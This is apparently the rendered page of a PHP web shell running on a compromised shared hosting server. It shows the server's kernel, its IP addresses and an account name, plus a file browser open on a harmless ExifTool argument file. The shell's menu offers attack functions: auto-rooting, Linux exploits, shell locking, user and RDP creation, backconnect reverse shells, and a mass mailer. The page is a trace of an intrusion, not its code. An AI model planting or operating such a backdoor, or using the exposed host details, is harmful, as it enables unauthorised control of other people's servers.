Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
libimage-exiftool-perl /
[ HOME SHELL ]
Name
Size
Permission
Action
exif2iptc.args
1.35
KB
-rw-r--r--
exif2xmp.args
2.12
KB
-rw-r--r--
gps2xmp.args
1.17
KB
-rw-r--r--
iptc2exif.args
1005
B
-rw-r--r--
iptc2xmp.args
2.59
KB
-rw-r--r--
iptcCore.args
5.79
KB
-rw-r--r--
pdf2xmp.args
979
B
-rw-r--r--
xmp2exif.args
2.29
KB
-rw-r--r--
xmp2gps.args
1.42
KB
-rw-r--r--
xmp2iptc.args
3.13
KB
-rw-r--r--
xmp2pdf.args
979
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exif2iptc.args
#------------------------------------------------------------------------------ # File: exif2iptc.args # # Description: Tag name translations for converting EXIF to IPTC # # Usage: exiftool -tagsFromFile SRCFILE -@ exif2iptc.args DSTFILE # # Requires: ExifTool version 6.51 or later # # Revisions: 2011/09/13 - P. Harvey Created # 2017/07/06 - PH Set time zone from new EXIF OffsetTime tags # # Notes: 1) IPTC requires a timezone but EXIF does not support one, so # the local timezone is assumed when writing the IPTC times # # 2) These arguments will not delete existing IPTC tags which are # missing from the EXIF. The IPTC tags should be deleted # beforehand if required. #------------------------------------------------------------------------------ -IPTC:By-line < EXIF:Artist -IPTC:CopyrightNotice < EXIF:Copyright -IPTC:Caption-Abstract < EXIF:ImageDescription # the inverse IPTC date and time conversions automagically pull the # appropriate date or time part out of the EXIF date/time value -IPTC:DateCreated < EXIF:DateTimeOriginal -IPTC:TimeCreated < EXIF:DateTimeOriginal -IPTC:TimeCreated < Composite:SubSecDateTimeOriginal -IPTC:DigitalCreationDate < EXIF:CreateDate -IPTC:DigitalCreationTime < EXIF:CreateDate -IPTC:DigitalCreationTime < Composite:SubSecCreateDate # end
Close